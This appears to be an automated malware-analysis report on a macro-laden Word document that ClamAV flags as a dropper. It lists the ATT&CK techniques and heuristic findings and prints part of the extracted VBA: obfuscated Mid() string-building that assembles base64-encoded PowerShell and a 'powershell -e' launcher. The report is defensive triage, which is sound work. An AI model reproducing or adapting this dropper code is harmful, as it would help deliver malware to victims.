MALICIOUS
Risk Score: 244
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. Its AutoOpen macro triggers a Shell() call, which is highly suspicious. This indicates the document is designed to download and execute a second-stage payload, most likely through the embedded macro code recovered as macros.bas.
Heuristics (8)
- ClamAV: Doc.Dropper.Agent-6362992-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6362992-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44794 bytes |

SHA-256: 63c9350f44486041d25011b23ab6407a6fba5bab4ca1395118d643d7a391e4f0
Detection (ClamAV): No threats found
Obfuscation or payload: likely (carved artifact contains 58 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "URvlaIznq"
Function ZHWHpPwwi()
SkKMEpNrb = QKXIViOjO
UUtpwQmCJmZ = Mid("QbsziqxADEAMQAsADkAOAAsACAAMQAwADYALAAgADEAS34qbdG8oXkrc8qjc9b7GS", 7, 37)
oAJZXN = UUtpwQmCJmZ
DaqwfJsch = NZqnaViZm
DErqcZiqV = Mid("5VNdCRzUj9QAwADUALAAxADAAOAAgACwAMQAwADEAIAAsADQAMAAsACAAMwA2ACAALAAxADEANwAsADEAMQA0ACAALAAgADEAMAA4AOJLcK3nnaoQ0", 11, 92)
ihBUuWWa = DErqcZiqV
lTsnuicXu = dwFHLBzBa
EijGKWo = Mid("WZjWLcsHalCJdm6wmDEAIAAsACAAOQA4ACTHJawd8ApGrmi1Qw", 18, 17)
YRwjE = EijGKWo
wTEAUcHzS = ldjCawwcM
LswwI = Mid("aE4vHjaqCDtn8R4mU6U8QROAbp7wcAfhZxADEANgAsACAANQA5ACAALAAzADYAIAAsAqRM", 34, 34)
JDHiYt = LswwI
VQjMWHPOj = cFNpqZulG
ZBYaQ = Mid("TcatCAO9sNXt1QXaYB6UMACwAOQA3ACAALAAxADEANgAsACAAMQAwADQALAAzADIAIAAsADYAMQAgACwAIAAzADIALAAzADYAIAAsADEAMAAxACAALAAgADEAMQAwACwAMQAxADgAIAAsADUAOAAsADEAMQA2ACwAMQAwADEAIAAsACAAMQAwADkALAAgADEAMQAyACAALAAgADMAMgAgACNf9HuOwntp", 22, 194)
AKzEm = ZBYaQ
hlzPfuLqu = KbVJLiobl
YqoOzsA = Mid("AEAMAAxACwANQA5ACwAIAAxADIANQAsADEAMgA1ACkAIAB8ACUAIAB7ACAAKABbAEMASABBAFIAXQBbAGkAbgBUAF0AJABfACkAfQAgACkAKQB8AC4AKAAgACQARQBOAFYAOgBwAFUAYgBsAGkAYwBbADEAMmo1Tu5i898065jcw7CvpSiBNDTIHjb", 2, 155)
HXKokF = YqoOzsA
ukzwlGwfu = EwmKIopOr
JjtrUClcuz = Mid("6GGDlNwAgACwAIAAxADEAMwAsACAAOAA3ACAALAA3ADIALAAgADcAOAAsACAANwA3ACAALAAgADcANAAsACAAOQAwACAALAA0ADcAIAAsADQANAAgACwAMQAwADQALAAxADEANgAsACAAMQAxADYAIAAsADEAMQAyACwdihc0jCjXwL8RjdQL8Fu", 6, 158)
Qtjzz = JjtrUClcuz
NGkmAfNEm = KSufAOoAB
EmTow = Mid("uPUzFITEwmjHbs3CMaFs8uvj%!!%SVQEWNZTm%! -e WwBzAHQAUgBpAE4ARwBdADoAOgBKAG8AaQBOACgAJwAnACAAwXkEpAi9wKUL79FY", 22, 70)
FTFSVCZRfz = EmTow
JlzsTzzGu = HASjTzraV
HKEhi = Mid("MAAgADEAMAA2ACwAMQAwADEAIAAsADkAOQAsADEAMQA2ACAALAAzADIALAAgAhiR4mw7dabcihwJI2XwS", 2, 60)
sWXXzVzPVZB = HKEhi
AIjRjjTlN = AZwYWInjd
Ajhhlw = Mid("pzGdQKGTdocBcd3ahMEANgAsADEAMQA0ACwAMQAyADEAIAAsACAAMQAyADMALAAgADMANgAgACwAMQAxADkALAAxADAAMQAsACAAOQA4ACwAIAA5ADkAIAAsADEAMAA4ACwAMQAwADUAIAAsADEAMAAxACAALAAxADEAMAAsACAAfIdv3o8qlzcob2GcSj", 19, 154)
vjPVWIY = Ajhhlw
rUmkmtlGE = UdwzoZtns
ZUpHZ = Mid("YlAjFOIDEAMQA0ACwAIAA5ADcAIAAsACAAMQAxADAAIAAsACAAMQAwADAAIAAsADEAMiL88zjfD5419t1s2avIwojN", 8, 60)
jtYXmFzC = ZUpHZ
RrCSZimzh = wjiKtnUzF
aHwAicirKm = Mid("IaLnmzaWjmJ4Z5T5DJ8ViMFset %ibXMDDuvj%=wers&&set %DXGlzQqzP%=ptiNFKMKj&&set %ZHWHpPwwi%=po&&set %hNDTNtjJD%=wXwfWVsWw&&set %SVQEWNZTm%=hell&&set %2MU7j", 24, 123)
RzNLpN = aHwAicirKm
jPVpjcczI = ODkWiiQVp
IYYwCcdYOSV = Mid("fWf6Bnz8hrzCMDgANwAsACAAOAAzACAALAAgADkAOQAgACwAMQAxADQAIAAsACAAMQAwADUALAAxADEAMgAsADEAMQA2ACwAIAA0ADYALAA4ADMALAAxADAANAAshkw", 14, 111)
qoPJY = IYYwCcdYOSV
bYvDwmLmX = aJjLdoUKX
ITVuS = Mid("22zDYPuuOBDshsE6oRAROnjwcHWEnEB%=EbqZhLEBn&&!%ZHWHpPwwi%!!%ibXMDDVULYzYBaEB3LpD0w5", 23, 43)
WSmKJzzcfr = ITVuS
WcKZqZaYw = wcEvuXwta
DFGHa = Mid("jTIjwciLqIAAsACAAOQA3ACAALAAgADEAMQA1ACwAIAAxADEANgAsADEAMAA1ACAALAAgADkANwAsAjGTvWroq", 10, 69)
rwMGXD = DFGHa
KfRjdtFBq = YDavCUKtt
wtoKaQh = Mid("WlhCAAMQAxADAAIAAsACAAMQAwADQAIAAsACAAMQAxADEALAAxADAAM1Wvv6q63Ph", 4, 52)
jiZpFErA = wtoKaQh
iBiVdapPK = TfOMMjOJf
TkLfUtQjJ = Mid("dCoBRa59wANAAzACwAMwAyACAALAAzADkAIAAsADkAMgAgACwAIAAzADkALAAgADMAMgAszHG", 9, 62)
UoObDhjoIR = TkLfUtQjJ
GmwQUojBU = WAZjkAiUr
ktzDPTpHK = Mid("NPfK0WIDLAMQAxADAALAAxADAAMQAgACwAMQAxADkAIAAsADQANQAgACwAIAAoCjj", 10, 52)
EZXijFisjSY = ktzDPTpHK
soBrtOjlW = bMrqhspEH
sIVvbtjlw = Mid("hXYTT284zDQhjwT16DwcPrYACMAAxACwAOQA5ACwAIAAxADEANgAsADMAMgAgACwAIAA0ADUALAA2ADcAIAAsADEkER8SbNTXnPIS", 26, 63)
vVwQlPTwL = sIVvbtjlw
uNhtlbFTO = kjuNhssVV
GfNbcOLQtzG = Mid("ziIA8bt3TDmBaocIImJ3DX0ADEALAA0ADQAIAAsADMAMgAsACAAMwA2ACwAIAAxADEAMgAgACwAOQA3ACwAIAAxADEANgAsADEAMAA0ACAALAA0ADEApqtwdJiCFn", 23, 92)
VEKqUw = GfNbcOLQtzG
dOtkhiRIp = djThtftjG
wjjzq = Mid("SPCAALAAgADQANgAsACAAOAA0ACwAIAAxADEAMQAgACwAIAA4ADMAHtksSci19fApO9", 3,
... (truncated)